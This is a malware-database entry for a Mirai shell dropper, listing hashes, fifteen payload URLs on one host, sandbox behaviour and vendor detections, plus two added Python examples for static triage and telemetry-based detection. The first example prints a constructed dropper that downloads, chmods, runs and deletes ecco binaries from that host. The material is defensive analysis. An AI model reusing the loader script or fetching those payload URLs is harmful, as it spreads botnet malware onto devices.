MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 9

SHA256 hash: ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4
SHA3-384 hash: a151592ef4205078d26e2d37ead605a03f65ab988f2bc4e72c590aa0706a1b08ef4cd709c514f0b49131b495441d2d77
SHA1 hash: b39b79bd3f607b9edf2d45575ecda37ac7b9f065
MD5 hash: 773672cf2f1ab9a093f1bd1e9e2a3186
humanhash: india-montana-magazine-arkansas
File name: 1.sh
Signature: Mirai
File size: 3,269 bytes
First seen: 2025-12-04 20:25:23 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:itmqtlMtk6tNUtH8t/QtIKtSCtXWLtuWtJZet1ctQit0yth/H:Z
TLSH: T18761D6E511428B346DDB5812A368CB7D3441699FE0EF8F1667FC29BA1C4CEC8AC4D742
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1); 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URLs referenced by this script (URL | Malware sample SHA256 | Signature | Tags):

http://103.77.241.135/00101010101001/ecco.x86 | 103907e6ca47f6bbe07532ba717b2b96cfd763c8e73c9de04745116ee65e9ca6 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.mips | 9440dc8f19584608d360d0e34cef50ff1b49b8a928044541aba3e0c9a70390a8 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arc | ef24158ad8b15653332d0d4da39959653192ada5f87495c213a15d005a84c7e9 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.i468 | n/a | n/a | elf ua-wget
http://103.77.241.135/00101010101001/ecco.i686 | 9b8020883de80c73cdb74172e7f51d74f3dc120b8160e26d13982e6bab610d48 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.x86_64 | a7902c832e838c2241aea7865b3d750172aa827818a06312b57e4de0b50d45d1 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.mpsl | 4da6469d827579d5dcfef6b28149d537b49973dab526572a946bb7b0b6b7a969 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm | 6e378cb43fd51ab19e02bef1dfc9d1257feb07b714d288c4acbbe39f698f7ac1 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm5 | 56fec56fef4a92c7c0f98185ea124d9a731e85d6888fc64e05fcf10009e1bc7d | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm6 | d17b591889069d9cd3bf82ab91ef30b931a7bf1f56abd7ec5c96f9219864acb0 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm7 | 68e5952dc56e1479c2b0dc59f094505a066895c683bb9a563e140e00e525623f | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.ppc | 778e0e157498c9ced95dacf95ebaf2b5eed337e3d7f9bd797fc340091408e41d | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.spc | n/a | n/a | elf ua-wget
http://103.77.241.135/00101010101001/ecco.m68k | 42c43660e6c30a812458adb9e9252fc72daa0fed1d0fff255724d65bd85c37e1 | Mirai | elf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.sh4 | 66923770ca13fe676287aabe7167c065eccef8d990903a2512fea3d693455402 | Mirai | elf mirai ua-wget

All fifteen payloads are served from the same host and directory, one build per CPU architecture; no sample is recorded (n/a) for ecco.i468 and ecco.spc.
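The table above lists fifteen architecture-specific payloads fetched from one host. As an added example, not the sample's own script and not code from MalwareBazaar, the following Python performs static triage of a Mirai-style dropper without executing it: it unrolls the shell `for` loop, pulls out every wget/curl URL, and checks whether the same file names are fetched, made executable, run and deleted, which is the downloader chain this entry's sandbox run shows. SAMPLE_SCRIPT is a constructed stand-in modelled on this entry's recorded behaviour and URL list, not the real 1.sh; the helper names (simple_commands, triage, verdict, defang) are the example's own.

```python
import re
import shlex

# Constructed stand-in for the dropper (the page does not reproduce the real 1.sh body):
# it mirrors the recorded behaviour, wget/curl fetch of ecco.<arch> from 103.77.241.135,
# chmod, execute, rm, using the fifteen URLs from the IOC table.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
cp /bin/busybox ecco
for a in x86 mips arc i468 i686 x86_64 mpsl arm arm5 arm6 arm7 ppc spc m68k sh4
do
  wget http://103.77.241.135/00101010101001/ecco.$a -O ecco.$a
  curl -s http://103.77.241.135/00101010101001/ecco.$a -o ecco.$a
  chmod 777 ecco.$a
  ./ecco.$a ssh
  rm -rf ecco.$a
done
"""

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
URL_RE = re.compile(r"^[a-z]+://", re.I)
FOR_RE = re.compile(r"^for\s+(\w+)\s+in\s+(.*?)\s*(?:;\s*do)?$")


def simple_commands(script):
    """Yield simple commands, unrolling one level of `for VAR in ...; do ...; done`."""
    lines = [l.strip() for l in script.splitlines()
             if l.strip() and not l.lstrip().startswith("#")]
    i = 0
    while i < len(lines):
        m = FOR_RE.match(lines[i])
        if not m:
            yield from SPLIT_RE.split(lines[i])
            i += 1
            continue
        var, items = m.group(1), m.group(2).split()
        i += 1
        if i < len(lines) and lines[i] == "do":
            i += 1
        body = []
        while i < len(lines) and lines[i] != "done":
            body.append(lines[i])
            i += 1
        i += 1  # skip "done"
        subst = re.compile(r"\$\{?%s\}?(?!\w)" % re.escape(var))
        for item in items:
            for line in body:
                yield from SPLIT_RE.split(subst.sub(item, line))


def triage(script):
    """Collect what the script fetches, makes executable, runs and deletes."""
    found = {"urls": [], "local": set(), "chmod": set(), "exec": set(), "rm": set(), "hosts": set()}
    for cmd in simple_commands(script):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in DOWNLOADERS:
            for k, arg in enumerate(argv[1:], 1):
                if URL_RE.match(arg):
                    if arg not in found["urls"]:
                        found["urls"].append(arg)
                    found["hosts"].add(arg.split("/")[2])
                    found["local"].add(arg.rsplit("/", 1)[-1])
                elif arg in ("-O", "-o") and k + 1 < len(argv):
                    found["local"].add(argv[k + 1])   # explicit output file name
        elif prog == "chmod":
            found["chmod"].update(a for a in argv[2:] if not a.startswith("-"))
        elif prog == "rm":
            found["rm"].update(a for a in argv[1:] if not a.startswith("-"))
        elif argv[0].startswith("./"):
            found["exec"].add(argv[0][2:])
    return found


def verdict(found, min_chain=3):
    """Downloader chain = the same file name fetched, chmod'ed, executed and removed."""
    chain = found["local"] & found["chmod"] & found["exec"] & found["rm"]
    return {"chain_files": sorted(chain), "hosts": sorted(found["hosts"]),
            "suspicious": len(chain) >= min_chain}


def defang(url):
    """Neutralise an IOC for reports: hxxp scheme and bracketed dots in the host."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    return scheme.replace("tt", "xx") + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print(verdict(result))
    for u in result["urls"]:
        print(defang(u))
```

The chain check is what separates a dropper from an installer script: a single wget followed by chmod is ordinary, but the same name being fetched, chmod'ed, executed and then removed for a dozen architectures is the Mirai loader idiom. Anything the loop parser cannot unroll (command substitution, `eval`, base64 stages) should be treated as a reason to escalate to a sandbox rather than as benign.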

Intelligence

File Origin
# of uploads: 1
# of downloads: 98
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
File Type: unix shell
First seen: 2025-12-04T10:38:00Z UTC
Last seen: 2025-12-04T18:36:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.gen, HEUR:Trojan-Downloader.Shell.Agent.a, HEUR:Trojan-Downloader.Shell.Agent.p
Status: terminated
Behavior Graph (rendered process graph, summarised):
/usr/bin/sudo (pid 3956) -> execve /tmp/sample.bin (pid 3963)
/tmp/sample.bin -> execve /usr/bin/cp once, then fifteen rounds of:
  -> execve /usr/bin/wget (net send-data to 103.77.241.135:80, 152 to 155 B per request)
  -> execve /usr/bin/curl (net send-data to 103.77.241.135:80, 101 to 104 B per request; write-file)
  -> execve /usr/bin/chmod
  -> clone /usr/bin/bash
  -> execve /usr/bin/rm (delete-file)
Every network edge in the graph terminates at the single endpoint 103.77.241.135:80.
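The behaviour graph above shows one parent process (/tmp/sample.bin) driving fifteen rounds of wget/curl, chmod, bash and rm against a single host. As an added example, not part of the MalwareBazaar page and not any vendor's detection logic, the following Python turns that shape into a detection over process telemetry: it parses a constructed line layout and alerts when one parent completes several fetch, chmod, rm cycles against one host inside a time window. The telemetry lines, the field layout, the pids and the benign contrast against 198.51.100.10 are all constructed to resemble the graph; adapt parse_event to your own EDR export.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}


@dataclass
class ProcEvent:
    ts: float
    pid: int
    ppid: int
    image: str
    action: str            # execve or clone
    dst: Optional[str]     # "ip:port" when the child sent data, else None


def parse_event(line):
    """Parse one telemetry line in the constructed layout 'ts pid ppid image action [net=ip:port]'."""
    parts = line.split()
    dst = None
    for extra in parts[5:]:
        if extra.startswith("net="):
            dst = extra[len("net="):]
    return ProcEvent(float(parts[0]), int(parts[1]), int(parts[2]), parts[3], parts[4], dst)


def synth_sample_telemetry():
    """Constructed lines shaped like this entry's behaviour graph (not real sandbox output)."""
    lines = ["1764880800.00 3963 3956 /tmp/sample.bin execve"]
    t, pid = 1764880800.0, 3970
    one_round = (("/usr/bin/wget", "execve", "net=103.77.241.135:80"),
                 ("/usr/bin/curl", "execve", "net=103.77.241.135:80"),
                 ("/usr/bin/chmod", "execve", ""),
                 ("/usr/bin/bash", "clone", ""),      # execution of the fetched file
                 ("/usr/bin/rm", "execve", ""))
    for _ in range(15):
        for image, action, net in one_round:
            t += 0.5
            pid += 1
            lines.append(f"{t:.2f} {pid} 3963 {image} {action} {net}".rstrip())
    # Benign contrast: an installer fetches one file and marks it executable; no loop, no rm.
    lines += ["1764880900.00 6000 1 /usr/bin/make execve",
              "1764880900.50 6001 6000 /usr/bin/wget execve net=198.51.100.10:443",
              "1764880901.00 6002 6000 /usr/bin/chmod execve"]
    return lines


def detect_fetch_exec_loops(events, min_cycles=3, window_s=600):
    """Alert when one parent repeatedly runs fetch -> chmod -> rm against a single host.

    The execution step is deliberately not required: in the graph it shows up only as a
    bash clone, and EDRs differ in how (or whether) they surface it.
    """
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)
    alerts = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e.ts)
        state, cycle_ts, hosts = 0, [], set()
        for ev in evs:
            name = ev.image.rsplit("/", 1)[-1]
            if name in DOWNLOADERS and ev.dst:
                hosts.add(ev.dst.rsplit(":", 1)[0])
                state = 1
            elif name == "chmod" and state == 1:
                state = 2
            elif name == "rm" and state == 2:
                cycle_ts.append(ev.ts)
                state = 0
        # Count cycles inside a sliding window so a slow, legitimate installer never trips it.
        best = 0
        for i, t0 in enumerate(cycle_ts):
            best = max(best, sum(1 for t in cycle_ts[i:] if t - t0 <= window_s))
        if best >= min_cycles:
            alerts.append({"ppid": ppid, "cycles": best, "hosts": sorted(hosts)})
    return alerts


if __name__ == "__main__":
    for alert in detect_fetch_exec_loops(parse_event(l) for l in synth_sample_telemetry()):
        print(alert)
```

Keying the state machine on the parent pid rather than on individual wget or curl executions is what keeps the rule quiet on hosts where package managers and CI runners download files all day: the signal is the repetition of the whole fetch, chmod, delete cycle from one parent toward one host, not any single download.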
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-12-04 17:10:48 UTC
File Type: Text (Shell)
AV detection: 22 of 37 (59.46%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai botnet defense_evasion discovery linux persistence upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
UPX packed file
Deletes log files
Enumerates running processes
Modifies init.d
Modifies rc script
Writes file to system bin folder
File and Directory Permissions Modification
Deletes Audit logs
Deletes system logs
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (197486) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Signature: Mirai
File type / SHA256: sh ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4 (this sample)
Delivery method: Distributed via web download
